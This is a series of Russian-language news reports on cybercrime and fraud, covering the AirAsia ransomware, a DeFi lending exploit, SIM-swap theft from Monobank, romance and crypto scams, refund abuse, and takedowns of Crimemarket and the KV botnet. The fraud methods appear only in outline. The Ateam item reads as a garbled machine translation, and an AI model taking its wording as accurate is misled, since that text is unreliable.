В промежутке между 11 и 12 ноября кибервымогатели Daixin Team провели успешную
атаку на AirAsia Group. Представитель группировки заявил, что им удалось
получить личные данные 5 миллионов пассажиров и всех сотрудников авиакомпании.
В качестве доказательства злоумышленники предоставили изданию DataBreaches и
жертве два CSV-файла. Один файл содержал информацию о пассажирах. А во втором
файле была информация о сотрудниках, включая имя, дату рождения, страну
рождения, место работы, дату начала работы, "секретный вопрос", ответ на него
и соль.
По словам представителя Daixin Team, AirAsia быстро отреагировала на атаку:
представитель компании вошел в чат с злоумышленниками, попросил предоставить
доказательства, а после получения образцов данных постарался узнать как можно
больше об удалении данных в случае уплаты выкупа.
“Ребята из AirAsia даже не пытались договориться о сумме выкупа, что может
говорить о том, что они не собираются ничего платить", – рассказал
DataBreaches представитель группировки. Пока неизвестно, сколько хакеры
потребовали за ключ для дешифрования данных, удаление всего украденного и
информирование AirAsia о найденных и использованных уязвимостях.
Представитель Daixin Team подчеркнул, что при блокировке файлов хакеры
старались не зацепить те, что связаны с летным оборудованием.
Однако удивительным стало другое заявление группировки – плохая организация
сети может избавить компанию от будущих атак. Злоумышленники рассказали, что
могли бы сделать больше, но их настолько разозлили хаотичная организация сети
и отсутствие каких-либо стандартов, что они не стали продолжать атаку.
Отдельный “привет” хакеры передали сисадминам AirAsia, назвав сеть компании
очень плохо защищенной и сравнив ее с разваливающимся сараем, построенным у
старого здания.
Сейчас Daixin Team планирует загрузить данные пассажиров и сотрудников на свой
сайт, а полную информацию о сети AirAsia выложить на хакерских форумах.
Злоумышленники попытались перестраховаться и заявили, что снимают с себя
ответственность за любые негативные последствия, связанные со сливом данных.
Произошел очередной взлом в сфере децентрализованных финансов. На этот раз пострадали проекты Agave и Hundred Finance – злоумышленникам удалось вывести активов на общую сумму $11 млн.
Хакерам удалось воспользоваться уязвимостью в функции смарт-контракта для поддержки «обернутых ETH» (wETH) в сети Gnosis Chain. Злоумышленники могли продолжать брать криптовалюты в долг до того, как приложения смогли сосчитать долг и обеспечение и прекратить выдавать долговые криптовалюты. Поэтому хакеры многократно использовали одни и те же средства в качестве обеспечения для получения кредитных токенов и, в конце концов, опустошили пулы ликвидности проектов.
На текущий момент известно, что злоумышленники смогли вывести $11 млн в токенах wETH, wBTC, LINK, USDC, wXDAI и Gnosis. При этом вернуть средства практически невозможно, тем более, что хакеры использовали миксер Tornado Cash для отмывания криптовалют.
Разработчик смарт-контрактов под псевдонимом Shegen подчеркнула, что протоколы Agave и Hundred Finance используют тот же код, что и популярный протокол DeFi Aave, в котором заблокировано активов на $18.4 млрд. Скорее всего, разработчики Aave неоднократно проводили аудит и исправили уязвимость, однако сам случай весьма показателен:
«Даже если код выглядит крайне безопасным, и в нем может быть уязвимость, которая порушит ваши надежды. Похоже, нельзя доверять даже самому безопасному коду».
Позднее Shegen провела дополнительное исследование и отметила, что уязвимость была причиной того, что разработчики Agave использовали функцию «небезопасным» путем. Однако, вероятность взлома была не слишком большой. Крупные проекты вроде Curve и Aave проводят дополнительные проверки обеспечения при выдаче кредитов и там такая ситуация невозможна.
Киберпреступная группировка, стоящая за распространением программы-вымогателя Conti, атаковала тайваньскую компанию Delta Electronics, которая производит электронику и является крупным поставщиком для таких гигантов, как Apple и Tesla.
Согласно официальному заявлению, киберинцидент произошёл 21 января. Также представители компании отметили, что команда кибербезопасности сразу зафиксировала атаку, взяла под контроль затронутые системы и начала восстановительные работы. Delta Electronics известна в первую очередь производством мощных источников бесперебойного питания (ИБП).
По словам руководства, кампания киберпреступников никак не повлияла на процесс. Однако новостное издание CTWANT заявило, что его сотрудникам удалось получить копию внутреннего отчёта о киберинциденте, в котором атака описывается в более мрачных тонах. Например, есть информация, что злоумышленники зашифровали более 1500 серверов и более 12 тыс. компьютеров Delta Electronics.
В настоящее время производитель электроники работает с Trend Micro и Microsoft над расследованием инцидента. В сети компании нашли копию программы- вымогателя, которая, согласно анализу, оказалась одной из версий Conti. Операторы шифровальщика запросили выкуп в размере $15 миллионов.
В сети неоднократно появлялись жалобы клиентов Monobank, пострадавших от действий неизвестных мошенников, которые утверждали, что никогда не сообщали третьим лицам своих данных для входа в интернет-банкинг. Тем не менее, неизвестные злоумышленники загадочным образом умудрялись украсть деньги, а позиция банка всегда оставалась непреклонной: вы сами виноваты в том, что где- то скомпрометировали ваши данные.
Озвучивались различные вероятные причины: брешь в безопасности банковского приложения, программы-шпионы, «кроты» внутри самого банка. Как бы там ни было, Monobank всегда прикрывается собственным регламентом и в любой непонятной ситуации отправляет потерпевших в Киберполицию, подсовывая им бланки заявлений, составленные так, чтобы переложить вину с банка на самого потерпевшего.
Так, в Полтавский районный суд обратилась клиентка, с просьбой о защите ее прав, в качестве потребителя финансовых услуг и признании недействительными денежных переводов с ее карты, совершенных неизвестными злоумышленниками. Также клиентка потребовала отменить насчитанную банком задолженность за просрочку погашения украденных кредитных средств в размере 19,5 тысяч гривен.
Началось все с того, что на смартфоне женщины пропала связь, а на резервный ящик электронной почты пришло письмо о смене пароля к основному ящику. На своем телефоне женщина обнаружила смс с сообщением о том, что ее номер заблокирован в связи с заказом услуги удаленной замены SIM.
Поскольку ничего из перечисленного она не делала, женщина немедленно связалась с поддержкой «Водафона», где подтвердили, что заказана замена сим-карты и есть подозрение, что ее инициировали мошенники.
Тогда женщина вошла в приложение Monobank, чтобы заблокировать карты и обезопасить себя от мошенников, но это не удалось – для входа требовалось пройти авторизацию при помощи ее мобильного номера, над которым она утратила контроль.
Дозвонившись на горячую линию Monobank, потерпевшая узнала, что за это время с ее счета были совершены 2 перевода, на общую сумму около 18 тысяч гривен. Деньги были отправлены на неизвестный ей картсчет в банке ПУМБ при помощи устройства, отличавшегося от ее смартфона.
Женщина объяснила, что деньги были переведены несанкционированно и попросила вернуть их, но оператор ответила, что это невозможно и посоветовала обращаться в полицию. При этом, даже во время их разговора мошенники пытались сменить финансовый номер к счетам жертвы, о чем ей сообщила оператор.
Потерпевшая неоднократно письменно обращалась в Monobank с объяснением обстоятельств и просьбой закрыть задолженность, возникшую в результате действий мошенников. Однако представители банка обвинили в сложившейся ситуации саму потерпевшую, заявив, что она сама передала злоумышленникам необходимые для входа данные, хотя и не указали, какими действиями или бездействием она могла это допустить.
Дополнительно, банк предложил обратиться в правоохранительные органы при помощи составленного ими заявления, в котором было указано от имени потерпевшей, что она сама добровольно передала злоумышленникам данные входа. Что, на самом деле, не соответствовало действительности.
Тогда потерпевшая отправила на юридический адрес банка несколько претензий, однако их проигнорировали, сославшись на банковскую тайну. Женщина требовала у представителей банка восстановить ей кредитный лимит, предоставить результаты проведенного банком расследования несанкционированного списания, указать устройство и IP-адрес мошенников., которые они использовали для незаконных операций и пояснить, почему данные подозрительные операции не насторожили службу безопасности банка и не вызвали у его сотрудников никакой реакции.
В ответ, представители банка сообщили только, что для входа был использован PIN-код, правильно введенный со второго раза. Информацию об устройстве и IP- адресе пообещали предоставить по запросу правоохранительных органов. В этом же письме банк признал действия неизвестных мошенническими, однако посоветовал погасить задолженность в течение 3 месяцев, пообещав за это отменить начисление процентов за просрочку погашения.
Внимательно рассмотрев иск потерпевшей, суд постановил, что действия представителей банка нарушают ряд статей Гражданского Кодекса Украины. Так, банк имеет право списывать деньги со счета клиента только на основании распоряжения клиента. И тот факт, что банк не обеспечил достаточных мер, чтобы идентифицировать личность клиента и допустил неправомерное списание средств, является халатностью, за которую должен нести ответственность банк.
Также, банк не привел достаточных доказательств того, что виновницей утечки данных стала потерпевшая – списание денег произошло с чужого устройства и в другом месте.
Также, согласно ст. 1073 ГКУ, в случае неправомерного списания средств, банк обязан немедленно зачислить эти деньги на счет клиента, погасить проценты и возместить причиненный ущерб.
Также, позиция банка идет вразрез с постановлением Правления НБУ №223 от 30.04.2010, которое снимает ответственность с клиента, который немедленно сообщил о неправомерном списании средств с его счета.
Также, согласно ранее вынесенному постановлению Верховного Суда, банк не имеет права требовать у клиента возмещения задолженности, если не были приведены обстоятельства, доказывающие, что клиент сам своими действиями или бездействием стал причиной незаконного использования злоумышленниками PIN-кода или другой информации, дающей возможность совершать перевод средств.
Окончательное решение суда: восстановить баланс на счету потерпевшей клиентки и отменить все начисленные ей штрафы, возникшие в результате неправомерного перевода денег на счет мошенников.
Житель Великобритании стал жертвой мошенничества с криптовалютами на сайте знакомств. Он разместил 150 000 фунтов стерлингов (около $200 000) в биткоинах на фейковой торговой платформе.
По словам Тома (ненастоящее имя жертвы), на сайте знакомств он познакомился с женщиной, представившейся как Цзя из Гонконга. В ходе многодневной переписки женщина рассказала, что она успешный и опытный инвестор в криптовалюты, и начала расписывать преимущества вложения денег в цифровые активы.
Мошенница сообщила, что собирается приехать в Великобританию и вместе с Томом зарабатывать деньги на криптовалюте. Британец сообщил Цзя, что ранее уже инвестировал в криптовалюту и имеет на кошельке биткоины.
В ходе переписки мошенница убедила Тома в том, что у нее есть инсайдерская информация, которая поможет им вместе заработать. Она прислала ему ссылку на якобы торговую платформу и предложила установить мобильное приложение этой площадки.
Затем Цзя убедила Тома разместить на ней 150 000 фунтов стерлингов (около $200 000) в BTC. После того, как британец разместил биткоины на площадке, они пропали с его депозита.
Он сообщил Цзя об исчезновении криптовалюты с платформы и попросил помощи в возврате денег. Однако та отказалась ему помочь, сославшись на то, что ей нужно навестить тяжело больную тетушку в Австралии и перестала выходить на связь. Когда Том понял, что стал жертвой мошенничества, он подал заявление в местные правоохранительные органы.
«В Московской области сотрудниками Управления уголовного розыска УМВД России по г. Севастополю при участии Росгвардии по подозрению в мошенничестве в особо крупном размере задержан гражданин одного из государств Западной Африки.
Полицейские установили, что в апреле текущего года 50-летняя жительница города-героя в одной из социальных сетей познакомилась с злоумышленником, который представился одиноким иностранцем, пилотом гражданской авиации. Онлайн-отношения развивались стремительно, и уже после нескольких дней переписки в мессенджере новый знакомый сообщил женщине, что отправил из-за границы для нее подарки – элитную парфюмерию, ювелирные изделия известных брендов, а также все свои накопления – сто тысяч долларов США для покупки недвижимости.
Мужчина уверял, что в скором времени они будут жить вдвоем в собственном доме. В подтверждение своих слов он прислал фотографию дорогостоящих подарков, но тут же написал, что для беспрепятственной переправки ценностей и валюты через границу на таможне нужно заплатить крупную пошлину. Якобы для того, чтобы уладить возникшие трудности, аферист убедил женщину осуществить восемь денежных переводов на указанные им банковские счета.
Получив денежные средства, иностранец признался жительнице Севастополя, что обманул ее, поскольку нуждался в деньгах, после чего потерпевшая обратилась с заявлением в полицию.
В результате оперативно-розыскных мероприятий севастопольские полицейские установили местонахождение подозреваемого и задержали его в подмосковной Балашихе. Как оказалось, задержанный не имеет никакого отношения к гражданской авиации, а во время общения с потерпевшей использовал вымышленное имя и чужую фотографию.
Следователем СО ОМВД России по Ленинскому району г. Севастополя возбуждено уголовное дело по признакам преступления, предусмотренного частью четвертой статьи 159 УК РФ.
В ходе обыска по адресу проживания фигуранта изъяты планшетные и портативные компьютеры, средства связи, банковские и сим-карты, а также другие предметы, имеющие доказательственное значение для уголовного дела. Имеются основания полагать, что задержанный может быть причастен к ряду аналогичных противоправных деяний. Ему избрана мера пресечения в виде заключения под стражу».
Базирующаяся на Сейшельских Островах островах криптовалютная биржа Bilaxy сообщила о взломе горячих кошельков. Пользователям рекомендовали воздержаться от депозитов. Компания не разглашает сумму ущерба.
Top Urgent-Bilaxy Hacked Notice Pls note Bilaxy Hot wallet was hacked, pls DON't send any funds to your bilaxy accounts again. We are racing with the time to checking and fixing. Pls wait for further Notice.@ICODrops @ICO_Analytics @CoinMarketCap @ Bilaxy Team
— Bilaxy (@Bilaxy_exchange) August 29, 2021
Click to expand...
В ночь с 28 на 29 августа Bilaxy внезапно прекратила работу. По информации аналитика по безопасности MyCrypto Гарри Денли, хакеры также вывели из строя службу поддержки биржи и заблокировали домены ее электронной почты.
Специалист отметил, что суточный торговый объем платформы превышает $338 млн — это достаточно крупная биржа. По его оценке, хакеры могли вывести около $70 млн.
Notables: Their zendesk (support[.]bilaxy[.]com) support is offline - no longer exists Their email subdomain (mail[.]bilaxy[.]com) returns the default nginx hold page pic.twitter.com/ilfFYW486c
— harry.eth (@sniko_) August 29, 2021
Click to expand...
Проект Hoge Finance сообщил, что в ходе атаки злоумышленники вывели с биржи порядка 1 млрд HOGE (~$161 700 по курсу на момент написания). По данным разработчиков, на взломанном кошельке хранилась криптовалюта стоимостью $22 млн.
Атака якобы затронула токены около 300 проектов, в том числе стейблкоины Tether (USDT) и нативные монеты DEX Uniswap (UNI). Эту информацию подтвердил журналист Колин Ву.
This hack resulted in the transferring of nearly 300 cryptos. Including @Tether_to, @Sparkster_Me, @usdcoin, @Kylin_Network, @iearnfinance, @0Chain, @Uniswap, @TerraVirtuaHQ, @SushiSwap and more.#BilaxyHack #BREAKING #cryptocurrencies #Hackers
— HOGE (@HogeFinance) August 29, 2021
Click to expand...
Команда Bilaxy сообщила, что работает над решением проблемы. Подробную информацию об инциденте компания обещала предоставить «после завершения технического обслуживания».
Биржа пытается связаться с эмитентом стейблкоина USDT, возможно, чтобы заморозить украденные активы. Она также попросила выйти на связь команду Hoge Finance.
Hi, we have important things to contact you, please send me a private message,thanks
— Bilaxy (@Bilaxy_exchange) August 28, 2021
Click to expand...
Индийские правоохранители задержали жителя города Мангалур, штат Карнатака, по подозрению в организации криптовалютной пирамиды Max Crypto Trading. С ее помощью более 50 инвесторов потеряли $200 000.
Расследование в отношении Кунджатбейла Муджиба Сайяда (Kunjathbail Mujib Sayyad) было начато еще в конце 2022 года. MAX App было доступно в магазинах приложений для Android. Сервис гарантировал инвесторам получение прибыли и обещал возврат денежных средств в течение 150 дней с момента вложения. Инвесторам предлагалась комиссия в 2% за каждого привлеченного инвестора.
Основатель Max Crypto Trading заявлял, что имеет связи с крупными криптовалютными трейдерами. Штаб-квартира проекта находится в городе Аджмане, на территории Объединенных Арабских Эмиратов, утверждали представители проекта. Как утверждают правоохранители, мошенник действовал исключительно онлайн, не имея физических офисов даже в Индии.
Согласно жалобам потерпевших, изначально проект Max Crypto Trading выплачивал инвесторам прибыль в долларах США. Однако уже спустя 50 дней после запуска Max Crypto Trading «испарилась». В общей сложности криптопирамида собрала от 52 инвесторов 1,66 крор индийских рупий (около $200 000).
Маджибу Сайяду предъявлены обвинения по статье 420 Уголовного кодекса Индии (мошенничество и хищение чужой собственности). Нарушителю также вменяется злоупотребление доверием и участие в преступном сговоре. Другие участники команды проекта пока остаются на свободе.
Оперативники Управления экономической безопасности и противодействия коррупции ГУ МВД России по г. Москве совместно с сотрудниками Управления «К» СЭБ ФСБ России при содействии специалистов Департамента безопасности ВТБ задержали подозреваемую в хищении денежных средств банка.
Как сообщалось ранее, злоумышленники приобретали юридические лица и регистрировали их на номинальных учредителей и руководителей. Они открывали расчетные счета и передавали необходимые для удаленного банковского обслуживания данные организаторам криминального бизнеса. Те в свою очередь использовали их для дистанционного оформления кредитов. По подозрению в данной противоправной деятельности полицейскими задержаны шестеро жителей столицы.
«В результате оперативно-розыскных мероприятий сотрудниками полиции был установлен аналогичный факт хищения денежных средств еще одной кредитной организации. Полицейскими задержана предполагаемая соучастница преступления – главный специалист офиса банка. Она открывала расчетные счета и оказывала содействие в получении согласований кредитов на крупные суммы.
По предварительным данным, сумма похищенных денежных средств превышает 100 млн рублей», – сообщила официальный представитель МВД России Ирина Волк.
В результате обысков, проведенных на территории Московского региона, полицейскими были обнаружены и изъяты печати, средства связи и документы, имеющие доказательное значение.
«Следователем УВД по ЮЗАО ГУ МВД России по г. Москве возбуждено уголовное дело по признакам преступления, предусмотренного частью 4 статьи 159 УК РФ. Фигурантке предъявлено обвинение и избрана мера пресечения в виде подписки о невыезде и надлежащем поведении
Продолжаются мероприятия, направленные на установление всех причастных к противоправной деятельности», – добавила Ирина Волк.
Лидеру группировки грозит пожизненное заключение за серию зверских нападений.
В США вынесен обвинительный приговор лидеру преступной группировки, совершавшей жестокие нападения на держателей криптовалюты. 24-летний Реми Сент-Феликс из Уэст-Палм-Бич признан виновным по девяти пунктам обвинения, включая сговор, похищение людей, ограбление и мошенничество.
Банда Сент-Феликса действовала с сентября 2022 по июль 2023 года, совершая вооружённые нападения на дома состоятельных жертв с целью хищения криптовалютных активов. Общая сумма похищенного оценивается в сотни миллионов долларов.
Один из эпизодов произошёл в апреле 2023 года в Дареме, Северная Каролина. Преступники, переодевшись строителями, ворвались в дом пожилой пары. Угрожая оружием и применяя насилие, они заставили мужа установить программу удалённого доступа на домашний компьютер. С помощью сообщника злоумышленники вывели более 150 тысяч долларов в криптовалюте с аккаунта жертвы на бирже Coinbase.
Преступная группа совершала подобные нападения в нескольких штатах, включая Нью-Йорк, Флориду и Техас. Злоумышленники отличались особой жестокостью, угрожая жертвам пытками и изнасилованием.
Для отмывания похищенных средств использовались анонимные криптовалюты и платформы без проверки личности клиентов. Сент-Феликс был арестован в июле 2023 года при подготовке очередного нападения в Нью-Йорке.
Представители Министерства юстиции США отметили, что, несмотря на попытки преступников скрыть следы с помощью шифрованной связи и анонимных транзакций, правоохранительным органам удалось их выследить и привлечь к ответственности.
Вынесенный приговор стал одним из более чем десяти обвинительных заключений по этому делу. Сент-Феликсу грозит минимальный срок в 7 лет лишения свободы, в то время как максимальное наказание — пожизненное заключение. Окончательный приговор будет вынесен 11 сентября этого года.
Данный случай демонстрирует растущую угрозу со стороны криминальных групп, нацеленных на владельцев криптовалют. Не обладая достаточными навыками и знаниями для совершения мошенничества «в цифре», они не брезгуют использовать грубую физическую силу и прибегать к жестоким методам запугивания для достижения своих целей.
justice[.]gov/opa/pr/man-convicted-violent-home-invasion-robberies-steal- cryptocurrency
Несколько дней назад сотрудник службы безопасности сети продуктовых магазинов «Магнит» заметил подозрительную активность — в славном городе Костроме резко увеличилось количество жалоб от онлайн покупателей, которые просили вернуть бабки за доставленные заказы. При этом все заявки на возврат средств поступали из одного и того же дома, различались только подъезды и квартиры. Безопасник смекнул, что по данному адресу завелись абузеры, которые рефают ликвидные товары, а потом перепродают их. С таким месседжем он и отправился в местный отдел жандармерии.
Так как чуваки рефали заказы в промышленных масштабах, то остаться незамеченными было практически нереально и стражам галактики удалось быстро установить их личности — мошенниками оказались два 23-х летних пацанчика из соседнего Ярославля, которые приехали в Кострому пару дней назад на «гастроли».
Жандармы дождались очередного заказа на доставку продуктов по злополучному адресу и отправились на точку вместе с курьером. Прямо во время передачи заказа сверхразумов положили на пол и как следует натыкали пушками в ебасосину. Далее копов было уже не остановить — они ворвались на арендованную темщиками хату и нашли там целый склад детского питания и подгузников.
В ходе общения с дознавателем выяснилось, что кентярики как следует закупились левыми симками, подняли ферму аккаунтов Магнита и оформляли заказы всевозможной х#йни не покладая рук — всего за два дня им удалось наебать магазин на 400 000 рублей. Весь полученный товар они сбывали скупам в разных регионах РФ по заниженной цене.
На данный момент оба гения преступного мира проходят по ст. 159 УК РФ, им грозит до 5-лет кайфа где-нибудь на мысе Дежнева.
Сотрудники управления по противодействию киберпреступности Брестской области задержали 20-летнего жителя Ивацевичей.
Молодой человек предлагал знакомым оформлять на себя за вознаграждение банковские карты, данные которых затем отправлял анонимному заказчику из интернета.
Установлено, что за год такой деятельности парень передал злоумышленникам доступ к счетам более 50 человек. Счета в дальнейшем использовались для вывода похищенных у граждан денежных средств.
Следователи возбудили пять уголовных дел за незаконный оборот средств платежа. Прежде фигурант уже попадал в поле зрения правоохранителей за надругательство над государственными символами.
В полицию обратилась жительница города Кирово-Чепецка с заявлением о совершенном в отношении нее дистанционном мошенничестве. Поверив малознакомому собеседнику в переписке в мессенджере, женщина передала ему 3 миллиона 625 тысяч рублей на «инвестиции в криптовалюту».
Как выяснили сотрудники МО МВД России «Кирово-Чепецкий», около года назад потерпевшая познакомилась в мессенджере с «финансовым консультантом». Все это время приятель по переписке убеждал ее выгодно вложить деньги. На днях чепчанка решилась, оформила кредит и по инструкциям собеседника отдала деньги пришедшему к ней домой незнакомому мужчине, который якобы должен перевести эти деньги в криптовалюту. Только после этого она осознала, что никто никаких гарантий ей не дал. По факту преступления, предусмотренного частью 4 статьи 159 УК РФ, возбуждено уголовное дело.
Чепецкие оперативники совместно с сотрудниками Управления уголовного розыска УМВД России по Кировской области установили местонахождение мужчины, выполнявшего функции курьера. Его задержали в Самаре и доставили в МО МВД России «Кирово-Чепецкий». Как выяснилось, житель Москвы 1984 года рождения следовал онлайн-инструкциям «работодателя», посещая адреса в разных городах, получая деньги от потерпевших и переводя их по диктуемым реквизитам. При себе у задержанного было изъято более 7 миллионов рублей, которые он по схожей схеме получил от жительницы Самары, но отправить не успел.
В настоящий момент ведется расследование, устанавливаются все обстоятельства произошедшего, личности иных причастных к хищениям лиц, а также дополнительные эпизоды противоправной деятельности фигурантов.
sc: [https://мвд.рф/news/item/49457819/](https://xn--b1aew.xn-- p1ai/news/item/49457819/)
В Германии полиция Дюссельдорфа совершила рейд против Crimemarket, крупнейшей немецкоязычной площадки нелегальной торговли, объединявшей более 180 тысяч пользователей. В ходе операции было арестовано шесть человек, среди которых был один из операторов сайта.
Crimemarket славился как центральный узел для сделок с запрещёнными веществами и услугами в сфере киберпреступности. Маркет также предлагал руководства и инструкции по осуществлению различных преступлений.
Расследование, предшествовавшее арестам, длилось годы и включало множество обысков, которые помогли идентифицировать операторов платформы и многих её пользователей.
В рамках скоординированной акции, к которой присоединились следователи из разных уголков Германии и зарубежья, было одновременно выполнено 102 обыска по всей стране вечером 29 февраля 2024 года.
Основное внимание акции было сосредоточено в Северном Рейне-Вестфалии, где были арестованы 3 человека, включая 23-летнего мужчину, считавшегося главным подозреваемым. Ещё 3 ареста произошли в других федеральных землях Германии.
Полиция изъяла множество доказательств, включая мобильные телефоны, компьютерное оборудование и носители данных. В Северном Рейне-Вестфалии были конфискованы наркотики, в том числе 1 килограмм марихуаны и различные таблетки экстази, а также почти 600 тысяч евро наличными и движимое имущество.
По информации полиции, операция направлена не только против операторов платформы Crimemarket, но и её пользователей. Расследование деятельности преступной сети всё ещё продолжается.
В начале прошлой недели пользователи Crimemarket начали сообщать о проблемах с доступом к сайту, что вызвало слухи о возможной связи с ликвидацией сервиса ChipMixer, используемого платформой для легализации платежей. Однако официальное объявление полиции подтвердило, что проблемы с доступом были вызваны именно действиями правоохранительных органов.
Несмотря на изъятие данных, главная страница сайта остаётся доступной, однако попытка перейти на любую другую страницу приводит к отображению уведомления о конфискации платформы.
Уведомление сообщает, что полиция в течение длительного времени мониторила эту платформу и её содержание в рамках координированной операции на уровне всей Европы, а все данные площадки на текущий момент изъяты.
Исходя из вышесказанного, похоже, что полиция решила разрешить киберпреступникам продолжать использовать платформу после конфискации для сбора идентификационных данных, учётных данных для входа и другой компрометирующей информации. Однако едва ли теперь туда сунется кто-то из нарушителей закона.
Конфискация платформы Crimemarket — это определённо важный шаг в борьбе с преступностью в Германии. Подобные целенаправленные полицейские операции являются важной мерой по оздоровлению киберпространства и созданию более безопасной среды для пользователей Интернета.
• Source: [https://duesseldorf.polizei.nrw/pre...r-ermittlungen-und-den- getroffenen-massnahmen](https://duesseldorf.polizei.nrw/presse/schlag-gegen- die-groesste-illegale-deutschsprachige-handelsplattform-im-internet- informationen-zum-stand-der-ermittlungen-und-den-getroffenen-massnahmen)
• Source: <https://tarnkappe.info/artikel/szene/dark-commerce/crimemarket-is- hack-oder-bust-290001.html>
Представители ФБР заявили, что им удалось ликвидировать ботнет KV, используемый хакерами из китайской группировки Volt Typhoon (она же Bronze Silhouette, DEV-0391, Insidious Taurus и Vanguard Panda) для уклонения от обнаружения во время атак, которые нацелены на критическую инфраструктуру США.
Сообщается, что Volt Typhoon применяла малварь KV (она же KV-botnet) для взлома и захвата сотен SOHO-роутеров по всей территории США и использовала их, чтобы смешать свою вредоносную деятельность с обычным сетевым трафиком, в итоге скрываясь от обнаружения.
«Одной из функций ботнета KV является передача зашифрованного трафика между зараженными маршрутизаторами, что позволяет хакерам анонимизировать свою деятельность (то есть создается впечатление, что они действуют с SOHO- маршрутизаторов, а не с их реальных компьютеров в Китае)», — сообщают в ФБР.
Среди взломанных и добавленных в ботнет устройств были маршрутизаторы Netgear ProSAFE, Cisco RV320s и DrayTek Vigor, а также IP-камеры Axis, [как сообщали ранее исследователи Black Lotus Labs](https://blog.lumen.com/routers-roasting- on-an-open-firewall-the-kv-botnet-investigation/), которые в декабре прошлого года впервые связали эту малварь с китайской хак-группой.
Также стоит отметить, что [согласно отчету SecurityScorecard](https://securityscorecard.com/blog/threat-intelligence- research-volt-typhoon/), опубликованному в начале этого месяца, Volt Typhoon смогла захватить около 30% всех устройств Cisco RV320/325, доступных в сети, и для этого хакерам понадобилось всего около месяца.
Ранее специалисты Microsoft писали, что за последние годы группировка закрепилась в критически важных инфраструктурных средах на всей территории США и Гуама (остров, имеющий статус неинкорпорированной организованной территории США, на котором размещено несколько военных баз), похищая учетные данные, конфиденциальную информацию и оставаясь практически незамеченной.
«Вредоносное ПО Volt Typhoon позволяло Китаю скрывать предоперационную деятельность и эксплуатацию сетей критически важных объектов инфраструктуры в секторах связи, энергетики, транспорта и водоснабжения. Другими словами, Китай предпринимал шаги по поиску и подготовке к разрушению или ослаблению критически важных объектов гражданской инфраструктуры, которые обеспечивают нашу безопасность и стабильность, — заявил директор ФБР Кристофер Рэй (Christopher Wray). — Поэтому, совместно с партнерами, ФБР провело санкционированную судом сетевую операцию, чтобы заблокировать Volt Typhoon и доступ, которым пользовались [злоумышленники]».
Упомянутая операция ФБР началась 6 декабря 2023 года, когда правоохранительные органы получили судебный ордер, разрешающий уничтожить ботнет после взлома его управляющих серверов.
Специалисты отправили команды на взломанные устройства, чтобы отключить их от ботнета и не дать китайским хакерам скомпрометировать их снова. Другая команда вынудила вредоносное ПО удалить с устройств VPN-компонент ботнета и заблокировала хакерам возможность использовать роутеры для проведения дальнейших атак.
«Подавляющее большинство маршрутизаторов, входивших в ботнет KV, были устройствами Cisco и NetGear, которые оказались уязвимы, поскольку достигли окончания срока эксплуатации, то есть больше не получали исправлений безопасности от производителя или других обновлений, — поясняет Министерство юстиции США. — В ходе санкционированной судом операции вредоносное ПО ботнета KV было удалено с маршрутизаторов, а также были предприняты дополнительные шаги для разрыва их связи с ботнетом, например, блокировка связи с другими устройствами, используемыми для управления ботнетом».
При этом отмечается, что все профилактические меры перестанут действовать, если маршрутизаторы будут перезапущены. То есть после перезагрузки устройства снова станут уязвимы для атак.
Также на этой неделе CISA и ФБР выпустили руководство для производителей SOHO- маршрутизаторов, призвав их обеспечить защиту от продолжающихся атак группировки Volt Typhoon. Эти рекомендации включают автоматизацию обновлений безопасности, предоставление доступа к веб-интерфейсам управления только через LAN, а также устранение уязвимостей на этапах проектирования и разработки устройств.
• Source: fbi.gov/news/stories/chinese-hackers-have-entire-nation-in-their- crosshairs-fbi-director-warns
• Source: justice[.]gov/opa/pr/us-government-disrupts-botnet-peoples-republic- china-used-conceal-hacking-critical
• Source: .cisa.gov/sites/default/files/2024-01/SbD-Alert-Security-Design- Improvements-for-SOHO-Device-Manufacturers.pdf
Разработчик мобильных игр Ateam предупредил о закреплении клиентов в облачной безопасности.
Японский разработчик игр Ateam Entertainment доказал, что простая ошибка в конфигурации Google Диска может привести к надежному, новероятному раскрытию конфиденциальной информации почти миллионам человек в течение 6 лет и 8 месяцев. Японская фирма является разработчиком мобильных игр и приложений для повышения производительности.
Компания Ateam сообщила пользователям своих приложений и сервисов, сотрудникам и деловым партнерам о своей находке 21 ноября 2023 года. По данным компании, с марта 2017 года для примера компании в Google Диске неправильно установлено значение права доступа «Все в Интернете: любой пользователь может найти файл в Google и открыть его, не входя в аккаунт Google».
Небезопасно настроенный экземпляр Google Диск показывает 1 369 файлов с личной
информацией о клиентах Ateam, деловых партнерах Ateam, бывших и нынешних
сотрудниках и даже стажерах и людях, подавших заявки на должность в компании.
Компания Ateam подтвердила, что данные были раскрыты 935 779 человек, из них
98,9% — клиенты.
Данные, предоставляемые неправильной конфигурацией, различаются в зависимости от типа отношений каждого человека с компанией и могут включать следующее:
Компания заявляет, что не видела доказательств того, что злоумышленники украли раскрыли информацию, но предоставили людям сохранение бдительности в отношении нежелательных и подозрительных сообщений.
Если установить файл на Google Диск со значением «Все в Интернете», файл будет доступен для просмотра только тем, у кого есть URL-адрес шифрования, обычно предназначенный для совместной работы между людьми, работающими с конфиденциальными данными. Если сотрудник или другой пользователь, у которого есть ссылка, по электронной почте публикует ее публично, она может быть проиндексирована поисковыми последовательностями и стать общедоступной.
Хотя маловероятно, что кто-либо самостоятельно нашел открытый URL-адрес Google Диска, это необходимость для того, чтобы компании должным образом защитить свои облачные сервисы, чтобы предотвратить ошибочное раскрытие данных.
Бывший операционный директор финтех-стартапа Wirecard Ян Марсалек (Jan Marsalek), укравший со счетов компании около двух миллиардов долларов, находится в России. К таким выводам пришли в ходе своего расследования журналисты The Wall Street Journal, также намекнувшие на возможные связи Марсалека с российской разведкой.
Утверждается, что Марсалек на протяжении всех трех лет после своего исчезновения ведет активную финансовую жизнь. По данным издания, он запустил несколько инвестиционных проектов, участники которых не получили никакой прибыли, так как выделенные ими сотни миллионов долларов были просто украдены Марсалеком. Кроме того, в расследовании указано, что чех помогал с переправкой валюты, так или иначе связанной со структурами погибшего экс-главы ЧВК «Вагнер» Евгения Пригожина.
В последние годы Марсалек, якобы получивший паспорт гражданина России на вымышленное имя, занимается расширением своей бизнес-империи в Африке, регулярно посещая резиденцию в Дубае (ОАЭ). Связи с Ближним Востоком и черным континентом у него могли сохраниться еще со времен работы в Wirecard, когда Марсалек, по данным журналистов, помогал ГРУ и СВР оплачивать услуги информаторов и сотрудников разведки в этих регионах. Более того, бывший топ- менеджер сам собирал сведения о счетах работников немецких спецслужб в Wirecard и передавал их в Москву.
Кроме того, WSJ пишет, что Марсалек после 2020 года имел прямое отношение к организации работы разведывательной ячейки в Великобритании. В нее могли входить пять граждан Болгарии.
